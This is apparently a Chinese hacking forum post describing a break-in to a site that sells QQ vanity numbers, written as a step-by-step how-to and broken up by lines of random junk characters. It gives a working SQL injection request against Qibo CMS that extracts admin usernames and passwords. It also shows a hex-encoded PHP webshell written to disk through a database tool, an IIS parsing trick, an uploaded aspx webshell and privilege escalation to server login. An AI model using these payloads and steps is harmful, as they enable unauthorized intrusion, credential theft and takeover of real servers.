|
A2 z A( _0 {/ r# c
# h: B4 q7 ^: \* E( j+ j" M
6 N& ?$ o( k2 q+ k1 g- ?
# b/ Y8 ] v0 r/ j6 `# ?$ }. R0 Z" f. d 一、踩点寻找漏洞
9 N9 z U3 d, d" i7 p( f" H闲来无事,在各个QQ靓号群求买5位QQ,寻问半天无果就在百度搜索5位QQ扫号找到“目标”www.qq.com,打开一看就一静态页面,哇好多靓号啊,90000000,300000,98888888,199999999,哇这么多靓号,然后我去联系客服,要求客服登录账户看看,此处略去100字,然后开始撕逼,然后就有了下文。。。。
( b/ m. B) M$ b
随手拿御剑扫了一下好多php页面,随手加一个member发现是齐博1.0的内容管理系统,然后就去百度找漏洞,什么后门漏洞一一做测试都无果,找来找去找到一个全版本的注入漏洞,详细利用方法如下:
: p6 w! _ B/ P+ M- r先注册一个用户,记住注册时候的邮箱以uid号,
" o$ u5 t, e/ M3 H0 E9 y
/ f! K# \9 C9 P; A! Y
* ~% y/ S& d& y+ Y0 y
然后我们打开火狐浏览器简单构造一下,http://www.qq.com/member/userinfo.php?job=edit&step=2,发送数据包如下:
' ]1 M% u; z0 @0 N' e
2 M; R& M( q' C. s a( Y1 `4 E# rtruename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select user()) where uid=3%23
( P4 t4 l, K( w" c: }9 L
这里的email和uid一定要和注册的账号所吻合,然后访问,提示成功以后查看用户资料如图:
) p. a; d( G' y8 F# a+ p6 V6 x' m
6 {* {; ~4 N' j; \/ f" r5 f) B- e) V确实存在注入漏洞,那么我们来注入一下管理账号密码,修改数据包如:truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select concat(username,0x2e,password) from qb_members limit 1) where uid=3%23
( O p& \1 q/ s# ~( k7 ]
1 W% Q, R8 M( g6 u T1 L* Y: j
! P% c9 H$ R- I& Q- ?5 N" ~7 b" Q, a
解密进后台如图:
1 l' I2 Y1 `5 b1 i' C
w$ I* g$ Q& K
4 z$ `) _2 Q% I- I- U
. k3 }9 w" @" J9 V0 C( j
二、后台getwebshell
. w( J3 L* Q! X O: |1 I
进了后台,以前齐博有个后台getwebshell漏洞,在系统功能- 单篇文章独立页面管理-增加页面添加个webshell,如图:
, x( Z" z9 j' ?
4 T7 Y- N9 [9 k/ ~; H+ l( J
% c* z( I$ n' u4 E5 ~
$ v" {* t/ \; h' y( K$ \: _4 }4 U$ H
然后点确定,添加提示
- X! I% A6 W6 K3 B2 n4 F R3 i. N
4 W- X# U' ?3 n0 S
" \9 X w" M$ ~ L7 f
9 l; N6 B0 r! `/ ~由于是ii6.0的所以我们可以考虑一下解析漏洞,我们再来如图:
! y Q& M* ?9 M
) ]/ t B5 g5 { k
8 @; T4 R) z& K; t' ^+ y) U改静态页面为help.php;.htm,然后我们发现访问help.php;.htm是404(写文章之前测试是可以成功写入的),欧巴,他么的我们再想想别的办法,抽了一支烟,我们继续,他这里不是有个服务器信息、数据库工具吗,之前我们测试当前用户名是root,那么我们完全可以考虑利用服务器信息、数据库工具来导入一句话,屌屌的妈妈的,我们来演示一下,先把一句话hex编码一下,<?php assert($_POST[sb]);?>编码以后是:0x3C3F7068702061737365727428245F504F53545B73625D293B3F3EDA网站目录是D:\wwwroot\qq.com\admin\,注意我们要把\改成/,否则不成功D:/wwwroot/qq.com/admin/,下面我们来导一下
% B- I; a. F) J% J如图:
5 z \$ I- c9 S c4 Z% X
9 h2 d4 J( w2 R3 _0 D
* K! z! C3 I: y/ W; o
: d& _+ B9 Y2 g+ f- c之前已经测试过了用普通菜刀无法连接,测试用过狗菜刀也无法连接,用xiese打开
+ N' v- L2 f- {
6 b" p3 _* z$ u6 ]/ h8 D
) ~$ ]: s* Z+ X4 m
1 @' y; D8 P* ]; U0 ^/ }) b三、提权进服务器
% @: U7 m% ~" L T
经测试xise下一句话只有在admin目录下有权限浏览,且不能执行命令,庆幸的是支持aspx,那么我们就上一个aspx大马,然后执行命令提示拒绝访问,哈哈在c:\windows\temp下上传cmd.exe然后执行systeminfo,发现打了400多补丁,如图:
9 a: g2 E9 B* c2 \6 V) e/ O
$ c5 r9 @) P @' p. K
1 o. K# j) }5 d$ H+ M
啧啧啧,这么多补丁,我都没去试试今年和2014年放出来的exp,而且是在咱们大00下载了一个变异pr,然后上传提权如图:
@* y3 Y: f4 ?8 i7 ?. I: e
# D% Q1 L7 {+ O6 i4 o9 D1 \
1 I; W- m" d2 v. j5 `然后登陆服务器如图:
3 L& k4 |: A! Q6 p) y2 ^
; x2 L' y, h% w8 @5 m
& e; N4 {8 y' |4 b5 Y4 M7 d3 c
, W! `9 N$ T7 E2 y; g8 T' J3 k5 `( X$ L8 h: p9 Z5 N# n
3 A0 u5 C% J: P难怪普通刀连接不上,原来是有狗。
' |3 X. c* I3 m! x% Y
6 ?2 m2 w, e- b+ z2 B$ {; N
6 f, _8 h7 R1 V2 t8 L' s
1 H7 H/ f6 }: ~ l6 m7 q: u8 k! y
) D0 A2 h& M, O0 Q( ]" V* `# `4 e. Y1 P+ E- q: U) N
: c- i( }/ ^, a8 @
| 
发表于 2018-10-20 20:08:47
收藏
支持
反对